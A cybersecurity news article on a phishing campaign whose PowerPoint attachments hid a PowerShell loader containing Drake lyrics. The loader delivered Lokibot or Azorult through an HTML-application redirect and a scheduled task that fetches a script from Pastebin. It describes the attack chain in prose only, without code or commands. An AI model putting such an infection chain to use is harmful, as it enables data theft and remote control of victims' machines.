Malware

Kiki do you love me; a Drake song is used to hack devices and steal information

We all like music, even cybercriminals. A report from cybersecurity firm AppRiver mentions that a malware campaign deployed via PowerPoint contains the lyrics to ‘In My Feelings’, by popular artist Drake, hiding a PowerShell command.

The hacker, who calls himself “Master
X”, infects his targets with two different kinds of malware: Lokibot, an
information theft malware variant, or using Azorult,
a Remote Access Trojan (RAT). Apparently the hacker starts by analyzing the
characteristics of the infected system and then choosing the appropriate
malware variant.

In its report, the cybersecurity firm indicates that the attack begins with a phishing email targeting companies previously selected for the attack. This email contains PowerPoint attachments loaded with malware.

A sample of the email sent by the hacker
SOURCE: AppRiver

When the victim opens the attachment, it runs a
script that uses the Microsoft HTML application host to redirect the user to a
shortened URL and evade the web browser’s own security protections.

A scheduled task is then created that arrives at the Pastebin URL every 60 minutes to retrieve a script that decides whether the user will be infected with Lokibot or Azorult. When the script is decoded and translated into a PowerShell script, it can be seen a snippet of the lyrics of the popular song (Kiki do you love me) as part of the infection process.

Screenshot of the PowerShell containig the song’s lyrics
SOURCE: AppRiver

Finally, this script downloads a malicious
executable file called calc.exe, to complete the infection process. In the
report, the cybersecurity firm mentions that there is no certainty about in the
range of success of the attack, as so far very few cases of infection are
known. The truth is that the few users who managed to detect the script were
mentioned surprised by the hacker’s twisted sense of humor when using the song
fragment.

However, experts from the International
Institute of Cyber Security (IICS) mention that this is an advanced malicious
development because, based on the features of the target system, Master X can
choose with which malware variant to infect the victim, a clear sign of the
complexity of the attack. Although only a few cases have been reported, users
are advised to remain alert to any hacking attempts, ignoring emails of
illegitimate appearance or with unsolicited attachments.

Comments
To Top

Pin It on Pinterest

Share This